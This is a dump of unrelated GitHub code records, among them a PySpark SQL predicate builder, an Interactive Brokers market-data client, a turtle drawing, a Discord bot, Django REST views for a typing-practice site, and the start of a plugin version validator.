_validate_param(predicate)\n\n if _is_predicate(predicate):\n return _process_predicate(predicate, sql)\n\n return \"({} {} {})\".format(\n _predicate_to_sql(predicate[0], sql),\n predicate[1],\n _predicate_to_sql(predicate[2], sql),\n )\n\n\ndef _process_predicate(predicate: PredicateType, sql: str):\n \"\"\"Process each predicate into a sql query string.\"\"\"\n\n def wrap_hypen_with_quotes(string: str):\n \"\"\"Take i.e. family.father-status and tansform into family.`father-status`.\"\"\"\n return \".\".join(\n [\"`{}`\".format(s) if \"-\" in s else s for s in string.split(\".\")]\n )\n\n def _get_null_operation(operand: str) -> str:\n return \"is null\" if operand == \"==\" else \"is not null\"\n\n def _is_null_statement(predicate: PredicateType) -> bool:\n return predicate[2] == \"null\"\n\n if _is_null_statement(predicate):\n return \"{} {}\".format(\n wrap_hypen_with_quotes(predicate[0]), _get_null_operation(predicate[1])\n ).strip()\n\n return \"{} {} {} {}\".format(\n sql,\n wrap_hypen_with_quotes(predicate[0]),\n predicate[1],\n _format_variable(predicate[1], predicate[2]),\n ).strip()\n\n\ndef _is_predicate(predicate: PredicateType) -> bool:\n \"\"\"Check the format of predicate and return boolean.\"\"\"\n return not _is_logical_predicate(predicate)\n\n\ndef _is_logical_predicate(predicate: PredicateType) -> bool:\n \"\"\"Check the format of logical predicate and return boolean.\"\"\"\n return tuple(map(type, predicate)) == (tuple, str, tuple)\n\n\ndef _validate_param(predicate: PredicateType) -> None:\n \"\"\"Validate predicate and logical predicate and raise value error if not.\"\"\"\n if _is_predicate(predicate):\n _validate_predicate(predicate)\n\n if _is_logical_predicate(predicate):\n _validate_logical_predicate(predicate)\n\n\ndef _validate_logical_predicate(predicate) -> None:\n \"\"\"Raise value error if the Logical Predicate operand is not AND/OR.\"\"\"\n if predicate[1].lower() not in (\"and\", \"or\"):\n raise ValueError(\n \"Only 'AND/OR' allowed in LogicalPredicate. But '{}' was provided\".format(\n predicate[1]\n )\n )\n\n\ndef _validate_predicate(predicate: PredicateType) -> None:\n \"\"\"Raise value error if the parameters does not confirm to allowed data types.\"\"\"\n allowable_types = [int, float, str, list, bool]\n if tuple(map(type, predicate)) not in [(str, str, dt) for dt in allowable_types]:\n raise ValueError(\n \"Expected format: (tuple, str, tuple) or any of, {}. But, got {}\".format(\n [(str, str, dt) for dt in allowable_types], predicate\n )\n )\n\n\ndef _column_present(dataframe: DataFrame, column: str) -> bool:\n \"\"\"Validate if the column exists in the dataframe.\"\"\"\n try:\n dataframe[column]\n return True\n except AnalysisException:\n return False\n\n\ndef _format_variable(operand: str, variable: A) -> str:\n \"\"\"Convert constant to SQL format according to its datatype.\"\"\"\n\n def add_quotes_around_string(variable, operand):\n # Do not add quote around the variable for null checks\n if (\n isinstance(variable, str)\n and variable.lower() != \"null\"\n and \"is\" not in operand.lower()\n ):\n return \"'{}'\".format(variable)\n\n return variable\n\n def add_quotes_around_list(variable):\n if isinstance(variable, list):\n if len(variable) > 1:\n return tuple(variable)\n return \"('{}')\".format(variable[0])\n\n return variable\n\n return add_quotes_around_list(add_quotes_around_string(variable, operand))\n\n\ndef _validate_column_exists(dataframe: DataFrame, col: str) -> None:\n \"\"\"Throw an error if the column does not exist.\"\"\"\n if not _column_present(dataframe, col):\n msg = f\"Column '{col}' is not present in the dataframes columns: {dataframe.columns}\"\n raise ValueError(msg)\n\n\ndef _add_new_column(\n dataframe: DataFrame, column_name: str, default_value: str\n) -> DataFrame:\n \"\"\"Add a new column to the dataframe.\"\"\"\n if default_value == \"array()\":\n return dataframe.withColumn(column_name, F.array().cast(\"array\"))\n\n return dataframe.withColumn(column_name, F.lit(None))\n\n\ndef _process_column(\n dataframe: DataFrame,\n col: str,\n add_new_column: bool = False,\n alias: str = None,\n cast: str = None,\n default_value: str = None,\n) -> Tuple[DataFrame, str]:\n \"\"\"Process a column and return its column name.\"\"\"\n\n def validate_cast(col: str) -> None:\n if \".\" in col:\n raise ValueError(\n f\"Can not cast nested column {col} please use the alias parameter also.\"\n )\n\n # Throw only error if column does not exists and if we should not add it\n if not add_new_column:\n _validate_column_exists(dataframe, col)\n\n # Add new column if none is present\n if not _column_present(dataframe, col):\n dataframe = _add_new_column(dataframe, col, default_value)\n\n # Rename the columns\n if alias:\n dataframe = dataframe.withColumn(alias, F.col(col))\n col = alias\n\n # Cast the column\n if cast:\n validate_cast(col)\n dataframe = cast_column(dataframe, col, cast)\n\n return dataframe, col\n","repo_name":"husqvarnagroup/GETL","sub_path":"getl/blocks/transform/transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":13318,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"52"} +{"seq_id":"70497932325","text":"import sys\n\n\"\"\" Adds the API directory to the import path. This is the more explicit and straightforward way for me but it can be done \n in a different way depending on your python and API library installation \"\"\"\nsys.path.append('/home/bruno/ib_api/9_73/IBJts/source/pythonclient')\n\nfrom threading import Thread\nimport logging\nimport time\n\nfrom ibapi.wrapper import EWrapper\nfrom ibapi.client import EClient\nfrom ibapi.contract import *\n\ndef get_stock_contract(symbol):\n contract = Contract()\n contract.currency = \"USD\"\n contract.exchange = \"SMART\"\n contract.secType = \"STK\"\n contract.symbol = symbol\n #### Certain stocks/etfs tickers needs the exchange specified in the contract\n if symbol in (\"GLD\", \"GDX\", \"GDXJ\"):\n contract.exchange = \"ARCA\"\n elif symbol in (\"MSFT\", \"INTC\", \"CSCO\"):\n contract.exchange = \"ISLAND\"\n ############################################################################\n return contract\n\n\n\"\"\" We are creating our IBExample class inheriting from both EClient and EWrapper.\n This way IBExample inherits all methods from Eclient and EWrapper \"\"\"\nclass IBExample(EClient, EWrapper):\n def __init__(self):\n \n \"\"\" Calls __init__ method (constructor) on EClient parent class and assigns itself as the wrapper.\n This way the API knows we are using this class (self) as the wrapper too.\n Another way would be: \n super().__init__(wrapper = self)\n but using EClient directly is more clear that we are calling EClient's constructor.\n Check EClient's __init__ method. on the API source code \"\"\"\n EClient.__init__(self, wrapper = self)\n\n \"\"\" This variable stores the id of the current request. Every time a method from the EClient class is called, \n it needs to have an id, this id is later received by the callbacks from the EWrapper class to know which EClass method \n fired that callback. \"\"\"\n self.req_id = 0\n\n \"\"\" This variable stores a map of request ids to a specific ticker. This way based on a request id that is sent by an \n Ewrapper callback, we know which ticker a specific EWrapper callback is sending data from. \"\"\"\n self.req_id_to_stock_ticker_map = {}\n\n\n \"\"\" This is the method from EClient that starts the connection with the server. It needs 3 arguments:\n 1. localhost address\n 2. specific listening port to connect, which should be configured in TWS or IB gateway, \n I think 7496 is the default.\n 3. application id. If there are several apps that connect to TWS or IB gateway on the same PC, \n each application should use a different number\n Documentation for this method can be checked online or in the client.py module from the API. \"\"\"\n self.connect(\"127.0.0.1\", 7496, 0)\n\n \"\"\" The run() method is inherited from EClient. This method starts the message loop.\n self.run() never returns cause it has an infinite loop inside with the message queue.\n One way to continue program execution is to run it inside a thread, like it is done here.\n Another way is to run the application code inside one of the callbacks of EWrapper, I think this way is\n how it is intended to be, but the advantage of creating a thread is that it is clearer how to separate\n application logic with the API logic.\n Got the thread idea from: https://qoppac.blogspot.com.uy/2017/03/interactive-brokers-native-python-api.html \"\"\"\n self.message_loop = Thread(target = self.run)\n self.message_loop.start()\n\n\n \"\"\" This method is a wrapper I made around reqMktData from EClient, it gets the next request id available,\n puts it on req_id_to_stock_ticker_map dictionary variable, and\n call EClient's reqMktData method with established default parameters.\n Check the documentation or the API source code comments for the available parameters of reqMktData \"\"\"\n def request_market_data(self, ticker):\n req_id = self.get_next_req_id()\n self.req_id_to_stock_ticker_map[req_id] = ticker\n self.reqMktData(req_id, get_stock_contract(ticker), \"\", False, False, [])\n\n\n \"\"\" This method belongs to EWrapper. It's a callback method (like all EWrapper methods) that responds to a method call in \n EClient, in this case, to reqMktData. Here it is being overridden to print the live quotes.\n Remember the usual workflow is to override methods from EWrapper to handle the requests\n made with methods from EClient.\n This method is called multiple times by the API with different tickTypes every time the price change (see\n parameter eplanation below)\n It receives 4 parameters with the requested information:\n 1. reqId: is the request id sent with reqMktData.\n 2. tickType: specifies what price is the callback associated with. A tickType of 1 means\n the price parameter is the bid price. A tickType of 2 means the price parameter is the ask price.\n So it is called one time for the bid price and one time for the ask price.\n Check the documentation or the API source for more details.\n 3. price: is the price associated with the tickType, in this case for the ask price.\n 4. attrib: canAutoExecute attribute. We are not using it here. \"\"\"\n def tickPrice(self, reqId, tickType, price:float, attrib):\n \"\"\" Calling original method before overriding. Original method only logs data \"\"\"\n super().tickPrice(reqId, tickType, price, attrib)\n\n if tickType == 2:\n print(f\"{time.strftime('%H:%M:%S')} : {self.req_id_to_stock_ticker_map[reqId]} => {format(price, '.2f')}\")\n\n\n \"\"\" This method belongs to EClient and is being overridden here. When Ctrl + c is clicked, this method is \n automatically called by the API. In this case it is overridden to clear market data streaming and disconnect. \n Check clear_all definition in the private methods section. \"\"\"\n def keyboardInterrupt(self):\n self.clear_all()\n\n\n ##########################################################################\n ################## Private\n ##########################################################################\n\n \"\"\" This is a custom method that goes over all request ids used in the session, cancels market data for all of them,\n and disconnects the client. \"\"\"\n def clear_all(self):\n print(\"Canceling market data...\")\n for req_id in self.req_id_to_stock_ticker_map.keys():\n self.cancelMktData(req_id) # This method belongs to EClient\n self.disconnect() # This method belongs to EClient\n print(\"Finished canceling market data.\")\n\n\n \"\"\" Just returns an incremental number. Used for different request ids for the API. \"\"\"\n def get_next_req_id(self):\n self.req_id += 1\n return self.req_id\n\n#------------------------------------------------------------------------\n\n\nif __name__ == \"__main__\":\n\n \"\"\" Creating basic logging file \"\"\"\n logging.basicConfig(filename='./example.log', level=logging.INFO)\n \n try:\n \"\"\" Create an instance of the class connecting to the API and call the request_market_data method for \n different tickers sent by command line parameters \"\"\"\n ib_example = IBExample()\n for ticker in sys.argv[1:]:\n ib_example.request_market_data(ticker)\n\n \"\"\" Waiting indefinitely to keep the main thread running and catch the program termination exception \"\"\"\n time.sleep(1000000000)\n except (KeyboardInterrupt, SystemExit) as e:\n ib_example.clear_all()\n print(\"Program stopped\")\n except:\n ib_example.clear_all()\n raise","repo_name":"alexanu/Python_Trading_Snippets","sub_path":"IB/IB_example.py","file_name":"IB_example.py","file_ext":"py","file_size_in_byte":7844,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"52"} +{"seq_id":"13314909578","text":"# Assignment 2 - Food Mosaic\n# Yvonne Aime, COP2500, July 4 2023\n\nimport turtle\n\n# Turtle is referenced as 't'\nt = turtle.Turtle()\n\n# Sets the screen object as 'screen'\nscreen = turtle.Screen()\n\n# Sets background color\nscreen.bgcolor(\"#80CCF0\")\n\n# Starts off drawing\nt.speed(3)\nt.penup()\nt.goto(0,-200)\nt.pendown()\nt.right(90)\n\n# Draw the hotdog buns\nt.penup()\nt.left(11)\nt.color('#C79450')\nt.begin_fill()\nt.circle(65, 180)\nt.forward(300)\nt.circle(65, 180)\nt.forward(300)\nt.end_fill()\nt.pendown()\n\n# Draws hot dog (frankfurter)\nt.penup()\nt.color('#d62929')\nt.right(10)\nt.begin_fill()\nt.circle(30, 180)\nt.forward(365)\nt.circle(30, 180)\nt.forward(365)\nt.end_fill()\nt.pendown()\n\n\n# Mustard on hot dog\nt.pensize(11)\nt.pencolor('yellow')\nt.penup()\nt.goto(35, 160)\nt.pendown()\n\nt.penup()\nt.begin_fill()\nt.color('yellow')\nt.pendown()\nt.forward(100)\nt.left(-30)\nt.end_fill()\n\nt.begin_fill()\nt.color('yellow')\nt.forward(60)\nt.left(50)\nt.end_fill()\n\n\nt.begin_fill()\nt.forward(60)\nt.end_fill()\nt.right(20)\nt.forward(40)\nt.left(30)\nt.forward(40)\nt.right(10)\nt.forward(10)\nt.right(50)\nt.forward(75)\n\n# Exits program\nturtle.done()","repo_name":"yvonneaime/COP2500","sub_path":"Assignments/Assignment2/mosaic.py","file_name":"mosaic.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"20454139810","text":"from discord.ext.commands import Context, Bot\r\nfrom discord import Message\r\n\r\nfrom json import load\r\n\r\nwith open(\"languages.json\", encoding=\"UTF-8\") as file:\r\n content = load(file)\r\n\r\nREFERENCE_NOT_FOUND = \"Reference not found for this message.\"\r\n\r\nbot_language = \"pt-br\"\r\n\r\n\r\nclass MyContext(Context):\r\n def get_language(self) -> str:\r\n return bot_language\r\n \r\n def get_reference(self, name: str) -> dict:\r\n return content[self.invoked_with][name]\r\n\r\n async def send(self, reference: dict, *, place_holder: dict={}):\r\n language = self.get_language()\r\n message = reference.pop(language, {})\r\n\r\n content = message.pop(\"content\", REFERENCE_NOT_FOUND).format(**place_holder)\r\n embed = message.pop(\"embed\", None)\r\n\r\n await super().send(content=content, embed=embed)\r\n\r\n\r\nclass MyBot(Bot):\r\n def __init__(self, *args, **kwargs):\r\n super().__init__(*args, **kwargs)\r\n \r\n self.languages = [\"pt-br\", \"english\"]\r\n \r\n @property\r\n def language(self) -> str:\r\n return bot_language\r\n\r\n @language.setter\r\n def language(self, value):\r\n global bot_language\r\n bot_language = value\r\n \r\n async def process_commands(self, message: Message):\r\n if message.author.bot:\r\n return\r\n\r\n ctx = await self.get_context(message, cls=MyContext)\r\n await self.invoke(ctx)\r\n","repo_name":"NiumXp/MultiLanguage-DiscordBot","sub_path":"structures.py","file_name":"structures.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"13429672870","text":"import cv2\nimport numpy as np\n\nfrom sklearn.cluster import AffinityPropagation, DBSCAN\n\n\nclass PointFinder(object):\n \"\"\"\n Finds coordinates of points in the image\n \"\"\"\n\n def __init__(self):\n self.frame = None\n self.point_centres = None\n\n self.min_point_area = 3\n\n def set_frame(self,\n frame):\n self.frame = frame\n\n def detect_points(self):\n contours, hierarchy = cv2.findContours(\n self.frame,\n cv2.RETR_TREE,\n cv2.CHAIN_APPROX_NONE)\n\n x_coords = []\n y_coords = []\n\n for c in contours:\n area = cv2.contourArea(c)\n\n if area < self.min_point_area:\n continue\n\n mom = cv2.moments(c)\n\n x_coords.append(int(mom['m10'] / mom['m00']))\n y_coords.append(int(mom['m01'] / mom['m00']))\n\n return np.vstack((np.array(x_coords), np.array(y_coords))).T\n\n\nclass PlayerFinder(object):\n def __init__(self,\n training_frame=None):\n self.clusterrer = AffinityPropagation()\n\n def cluster(self,\n coords: np.ndarray):\n if len(coords) == 0:\n return []\n\n self.clusterrer.fit(coords)\n\n return self.clusterrer.cluster_centers_\n","repo_name":"michal-racko/laser_tag","sub_path":"tools/shape_finder.py","file_name":"shape_finder.py","file_ext":"py","file_size_in_byte":1275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"2187485170","text":"import json\nimport os\nfrom pathlib import Path\nfrom typing import Any\n\nfrom click import secho\nfrom noneprompt import CancelledError, Choice, ConfirmPrompt, InputPrompt, ListPrompt\n\nDEFULAT_CONFIG_PATH = (\n Path(os.getcwd()).joinpath(\"voices_config\", \"slicer.json\").absolute()\n)\n\n\nclass Config:\n\n \"\"\"Slice Setting\"\"\"\n\n slice_min_sec: float = 0\n slice_max_sec: float = 15\n\n \"\"\"pinyin setting\"\"\"\n pinyin_heteronym_check: bool = True\n pinyin_interactive_check: bool = False\n\n \"\"\"tracker setting\"\"\"\n tracker_download: str = \"https://ali.well404.top/files/tracker.json\"\n tracker_path: str = str(DEFULAT_CONFIG_PATH.parent.joinpath(\"slicer_tracker.json\"))\n\n \"\"\"skip setting\"\"\"\n skip_exist_slice: bool = True\n\n def __dir__(self):\n return [\n \"slice_min_sec\",\n \"slice_max_sec\",\n \"pinyin_heteronym_check\",\n \"pinyin_interactive_check\",\n \"tracker_download\",\n \"tracker_path\",\n \"skip_exist_slice\",\n ]\n\n def __init__(self) -> None:\n if DEFULAT_CONFIG_PATH.exists():\n self.load(defualt=True)\n\n choices = [\n Choice(\"[🔧]修改配置\"),\n Choice(\"[📃]导入配置\"),\n Choice(\"[📝]导出配置\"),\n Choice(\"[🎉]完成修改\"),\n ]\n\n while True:\n secho(\n \"\\n\".join(\n [\n \"===== 当前配置项 =====\",\n f\"最小切片时长: {self.slice_min_sec}\",\n f\"最大切片时长: {self.slice_max_sec}\",\n f\"多音字检查: {self.pinyin_heteronym_check}\",\n f\"交互式多音字检查: {self.pinyin_heteronym_check}\",\n f\"多音字提示词典路径: {self.tracker_path}\",\n f\"多音字提示词典下载: {self.tracker_download}\",\n f\"跳过已存在的切片: {self.skip_exist_slice}\",\n ]\n )\n )\n choice = ListPrompt(\"请导出/载入/调整配置项, 或直接开始:\", choices=choices).prompt()\n if choice == choices[0]:\n self.modify()\n elif choice == choices[1]:\n self.load()\n elif choice == choices[2]:\n self.save()\n\n elif choice == choices[3]:\n break\n\n def modify(self):\n while True:\n try:\n min_sec = float(\n f\"\"\"{float(\n InputPrompt(\n \"请输入 **切片最短时长**, 取值范围为 [0, 5] 秒:\", default_text=str(self.slice_min_sec)\n ).prompt()\n ):.02f}\"\"\"\n )\n if 0 <= min_sec <= 5:\n self.slice_min_sec = min_sec\n break\n except CancelledError:\n secho(\"已终止配置流程! 已修改的部分将会保留!\", fg=\"bright_red\")\n return\n except Exception as e:\n secho(f\"输入值无法解析, 请重新输入: {e}\", fg=\"bright_red\")\n\n while True:\n try:\n max_sec = float(\n f\"\"\"{float(\n InputPrompt(\n \"请输入 **切片最长时长**, 取值范围为 (5, 20] 秒:\", default_text=str(self.slice_max_sec)\n ).prompt()\n ):.02f}\"\"\"\n )\n if 5 < max_sec <= 20:\n self.slice_max_sec = max_sec\n break\n except CancelledError:\n secho(\"已终止配置流程! 已修改的部分将会保留!\", fg=\"bright_red\")\n return\n except Exception as e:\n secho(f\"输入值无法解析, 请重新输入: {e}\", fg=\"bright_red\")\n\n try:\n self.pinyin_heteronym_check = ConfirmPrompt(\n \"是否开启多音字检查?\", default_choice=self.pinyin_heteronym_check\n ).prompt()\n if self.pinyin_heteronym_check:\n self.pinyin_interactive_check = ConfirmPrompt(\n \"是否开启 **交互式** 多音字检查?\", default_choice=self.pinyin_interactive_check\n ).prompt()\n else:\n self.pinyin_interactive_check = False\n\n self.tracker_download = InputPrompt(\n \"请输入 (若不想在线获取则留空)?\",\n default_text=self.tracker_download,\n ).prompt()\n self.tracker_path = InputPrompt(\n \"请输入 ?\", default_text=self.tracker_path\n ).prompt()\n\n except CancelledError:\n secho(\"已终止配置流程! 已修改的部分将会保留!\", fg=\"bright_red\")\n return\n\n def load(self, defualt: bool = False):\n if defualt:\n secho(\"检测到当前路径包含 slicer 的配置文件, 尝试读取\")\n try:\n ans = DEFULAT_CONFIG_PATH.read_text(encoding=\"utf-8\")\n except Exception as e:\n secho(f\"无法正常读取配置文件, 使用默认值: {e}\")\n return\n else:\n ans = InputPrompt(\n \"请输入配置文件的路径, 或直接输入其内容:\", default_text=str(DEFULAT_CONFIG_PATH)\n ).prompt()\n if ans.strip().startswith(\"{\"):\n secho(\"检测到输入为配置信息, 尝试解析\")\n else:\n secho(\"检测到输入为配置文件路径, 尝试读取\")\n try:\n ans = Path(ans).read_text(encoding=\"utf-8\")\n except Exception as e:\n secho(f\"无法正常读取配置文件: {e}\")\n self.load()\n\n try:\n cfg: dict[str, Any] = json.loads(ans.strip())\n secho(\"解析成功, 正在覆盖当前配置\", fg=\"bright_green\")\n except CancelledError:\n return\n except Exception as e:\n secho(f\"无法解析配置信息, 请重新输入: {e}\", fg=\"bright_red\")\n self.load()\n return\n for key in cfg:\n self.__setattr__(key, cfg[key])\n\n def save(self):\n cfg = json.dumps(\n {str(x): self.__getattribute__(x) for x in self.__dir__()},\n ensure_ascii=False,\n )\n try:\n ans = InputPrompt(\n \"请输入要保存的路径, 或输入 str 以直接获取其内容\", default_text=str(DEFULAT_CONFIG_PATH)\n ).prompt()\n if ans.lower() == \"str\":\n print(cfg)\n return\n des = Path(ans)\n des.parent.mkdir(0o755, True, True)\n des.write_text(cfg, encoding=\"utf-8\")\n return\n except CancelledError:\n return\n except Exception as e:\n secho(f\"无法正常写入, 请重新输入: {e}\", fg=\"bright_red\")\n self.save()\n\n\nconfig: Config = Config()\n","repo_name":"Well2333/VoiceS","sub_path":"VoiceS/functions/slicer/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":7144,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"52"} +{"seq_id":"41418929370","text":"import streamlit as st\nfrom PIL import Image\n\nst.set_page_config(\n page_title=\"Last Mile - Renner\",\n page_icon=\"chart_with_upwards_trend\",\n layout=\"wide\",\n)\n\nst.markdown(\n \"\"\"# Operação Last-Mile - **:red[Renner SA]**\n## Ferramentas de visualização de dados para auxílio à tomada de decisão\"\"\"\n)\nst.markdown(\n \"\"\"#### Operação Last-mile é a última etapa da malha logística da **:red[Renner]**, ou seja, a entrega para o cliente final. Por tratar-se de transporte, rotas e disponibilidade de entrega, é a etapa mais custosa da operação. Para aumentar a eficiância desta parte do processo, o time do **TP (transit point)** faz roteirização dos pedidos prontos e os disponibiliza aos motoristas para que a entrega seja feita.\"\"\"\n)\n\nrot1 = Image.open(r\"img/roteir1.jpg\")\nst.image(rot1)\n\nst.markdown(\n \"\"\"## Perguntas de negócio\n### Dadas as características da operação, algumas questões que se impõem são:\n- ##### Qual é a qualidade da roteirização?\n- ##### Quais são as principais regiões, horários e dias em que há mais entregas?\n- ##### Quantas remessas estão sendo entregues na média e no máximo?\n- ##### Como o tempo de deslocamento influencia nas entregas?\"\"\"\n)\nst.markdown(\n \"\"\"##### Buscando entender esta dinâmica e responder à estas questões, foi elaborado um estudo para que fosse possível visualizar os dados de forma mais clara e auxiliar os tomadores de decisão na condução de mudanças necessárias e acompanhamento sumarizado do dia-a-dia.\"\"\"\n)\n\nst.markdown(\"\")\nst.markdown(\"\")\nst.markdown(\"\")\nst.markdown(\n \"\"\"\n> ##### *_Este trabalho faz parte da disciplina de **Visualização de Dados**, lecionada pela professora [Isabel Harb Manssour](https://www.pucrs.br/pesquisadores/isabel-harb-manssour/)._*\n> ##### *_**Alunos**: [Leandra Torbes](https://github.com/ltorbes) | [Luiz Eduardo](https://github.com/luizsouzars)_*\"\"\",\n True,\n)\n","repo_name":"luizsouzars/VisDados-ProjFinal","sub_path":"Renner_lastmile.py","file_name":"Renner_lastmile.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"20673988127","text":"from django.shortcuts import render\nfrom rest_framework import generics\nfrom rest_framework.views import APIView\nfrom rest_framework import generics\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom .utils import pickRandValues, recommend_words_based_collaborative, recommend_words_based_on_pattern\nfrom .words import words, words_easy\nfrom .models import Test, UserTestResults, UsersScores, WordsSimMatrix\nfrom .serializers import TestSerializer, UserScoresSerializer, UserTestResultsSerializer, WordsSimMatrixSerializer\nfrom django.contrib.auth import get_user_model\nfrom rest_framework.permissions import IsAuthenticated\nfrom auth_api.serializers import UserSerializer\nfrom rest_framework.viewsets import ModelViewSet\nimport pandas as pd\n\nfrom pprint import pprint\n# Create your views here.\nfrom django.db.models import Q\nclass FetchWords(APIView):\n def get(self, request,mode, length):\n print(length)\n words_to_display = words_easy if mode == \"easy\" else words\n word_list = pickRandValues(words_to_display, length)\n return Response({\"words\" : word_list}, status=status.HTTP_200_OK)\n\n\nclass TestView(generics.ListAPIView, generics.CreateAPIView):\n queryset = Test.objects.all()\n serializer_class = TestSerializer\n \nclass UserProfile(generics.RetrieveUpdateAPIView):\n queryset = get_user_model().objects.all()\n # permission_classes = [IsAuthenticated]\n serializer_class = UserSerializer\n \n def retrieve(self, request, *args, **kwargs):\n instance = self.get_object()\n serializer = self.get_serializer(instance)\n # print(serializer.data)\n \n print(get_user_model().ROLES[serializer.data[\"role_id\"]][1])\n return Response({\n \"error\" : None,\n \"code\" : 200,\n \"data\" : {\n **serializer.data,\n \"role_id\" : get_user_model().ROLES[serializer.data[\"role_id\"]][1]\n },\n \"message\" : \"Success Fetching user profile\"\n })\n\nclass UserScores(generics.CreateAPIView, generics.UpdateAPIView):\n # serializer_class = UsersScores\n # queryset = UsersScores.objects.all()\n\n def create(self, request, *args, **kwargs):\n # pprint(request.data[\"word_scored\"])\n datas = request.data[\"word_scored\"]\n # print(datas)\n for d in datas:\n print(d)\n UsersScores.objects.update_or_create(user_id = d[\"user_id\"], item_id = d[\"item_id\"], defaults=d)\n # serializer = UserScoresSerializer(data=datas, many=True)\n # serializer.is_valid(raise_exception=True)\n # self.perform_create(serializer)\n # headers = self.get_success_headers(serializer.data)\n return Response(datas, status=status.HTTP_201_CREATED)\n # return Response(datas, status=status.HTTP_201_CREATED)\n\n\n\nclass TestResult(generics.CreateAPIView, generics.RetrieveAPIView):\n # serializer_class = UsersScores\n # queryset = UsersScores.objects.all()\n\n def create(self, request, *args, **kwargs):\n # pprint(request.data[\"word_scored\"])\n datas = request.data\n # print(datas)\n serializer = UserTestResultsSerializer(data=datas)\n serializer.is_valid(raise_exception=True)\n self.perform_create(serializer)\n headers = self.get_success_headers(serializer.data)\n return Response(datas, status=status.HTTP_201_CREATED, headers=headers)\n \n def Average(self, l):\n return sum(l) / len(l)\n\n def retrieve(self, request,user_id, *args, **kwargs):\n print(user_id)\n results = UserTestResults.objects.all().filter(user_id=user_id).order_by('timestamp')\n serializer = UserTestResultsSerializer(results, many=True)\n newlist = sorted(serializer.data, key=lambda d: d['speed'] , reverse=True)\n\n speed_list = [x[\"speed\"] for x in newlist]\n average = self.Average(speed_list)\n # average = self.Average([x[\"speed\"] for x in newlist])\n print(serializer.data[-10:])\n new_data = {\n \"top_speed\" : newlist[0][\"speed\"],\n \"low_speed\" : newlist[-1][\"speed\"],\n \"avg\": int(average),\n \"speeds\" : serializer.data[-10:]\n }\n return Response(new_data, status=status.HTTP_200_OK)\n\n\nclass GetRecommendation(generics.RetrieveAPIView):\n def retrieve(self, request, user_id, *args, **kwargs):\n if user_id == 0:\n word_list = pickRandValues(words, 90)\n return Response({\"words\" : word_list}, status=status.HTTP_200_OK) \n \n usersscores = UsersScores.objects.all()\n score_serializer = UserScoresSerializer(usersscores, many=True)\n\n scores_df = pd.DataFrame(score_serializer.data)\n\n # print(scores_df.head())\n # user_history = UsersScores.objects.all().filter(user_id=user_id)\n # history_serializer = UserScoresSerializer(user_history, many=True)\n\n print(\"user id = \", user_id)\n all_user_data = scores_df.query(f\"user_id == {user_id}\")\n df= all_user_data.drop_duplicates(subset = ['user_id', 'item_id'], keep=\"last\")\n highest_rating = df.sort_values(by='rating', ascending=False)\n print(highest_rating.shape)\n\n if len(highest_rating) == 0:\n word_list = pickRandValues(words, 30)\n return Response({\"words\" : word_list}, status=status.HTTP_200_OK) \n # print(highest_rating.iloc[:10,3].tolist())\n\n\n matrix = WordsSimMatrix.objects.filter(word__in= highest_rating.iloc[:2,3].tolist())\n serializer = WordsSimMatrixSerializer(matrix, many=True)\n data = serializer.data\n\n words_list = recommend_words_based_on_pattern(data, 25)\n words_list2 = recommend_words_based_collaborative(scores_df, user_id, 40)\n words_all = [*words_list, *words_list2]\n return Response({\n \"words\": words_all,\n # \"words\" : pickRandValues(words_all, 90)\n }, status=status.HTTP_200_OK)","repo_name":"MaulanaImamMuttaqin/website-ngetik-cepat","sub_path":"website_ngetik_cepat/app_api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19596113287","text":"import git\n\nfrom icon_validator.rules.validator import KomandPluginValidator\nfrom icon_validator.exceptions import ValidationException\nfrom git import Repo\nfrom git.exc import InvalidGitRepositoryError\nimport tempfile\nimport yaml\n\n\nclass RepoConstants:\n PLUGIN_DIRNAME = \"plugins\"\n PLUGIN_SPEC = \"plugin.spec.yaml\"\n\n\nclass SpecConstants:\n # normally you would use the pluginspec accessors...but we don't have pluginspec objects here\n # due to the fact that we don't actually have the \"remote\" plugin stored locally, comparing them this way is easy\n ACTIONS = \"actions\"\n TITLE = \"title\"\n INPUT = \"input\"\n OUTPUT = \"output\"\n TYPE = \"type\"\n TYPES = \"types\"\n REQUIRED = \"required\"\n CONNECTIONS = \"connection\"\n TRIGGERS = \"triggers\"\n TASKS = \"tasks\"\n\n\nclass VersionBumpValidator(KomandPluginValidator):\n\n def __init__(self):\n super().__init__()\n self.MAJOR_INSTRUCTIONS_STRING = \"\"\n self.MINOR_INSTRUCTIONS_STRING = \"\"\n self.name = \"Version Increment Validator\"\n\n @staticmethod\n def get_remote_spec(spec):\n \"\"\"\n Get the existing remote spec for this plugin from the repo\n \"\"\"\n directory = spec.directory.split(f\"/{RepoConstants.PLUGIN_DIRNAME}/\")[0]\n try:\n repo = Repo(directory)\n except InvalidGitRepositoryError:\n raise ValidationException(\"Incorrect directory passed- must be an individual plugin directory\")\n\n remote_list = repo.remote().refs\n blob = VersionBumpValidator.get_plugin_spec_blob(remote_list, spec.spec_dictionary()[\"name\"])\n # case: remote spec not found\n if blob is None:\n return None\n\n # if all went well and no exceptions, we now have the blob of plugin spec\n # using a temp file because stream_data requires a data object\n try:\n remote_spec = yaml.safe_load(blob.data_stream.read())\n except yaml.YAMLError:\n raise ValidationException(\"Remote plugin.spec.yaml contains incorrect yaml and must be fixed. \"\n \"If this change fixes remote spec, disregard this error message\")\n return remote_spec\n\n @staticmethod\n def get_plugin_spec_blob(remote_list: [git.RemoteReference], plugin_name: str):\n \"\"\"\n Get the plugin spec blob from the remote repo\n \"\"\"\n blob = None\n remote = 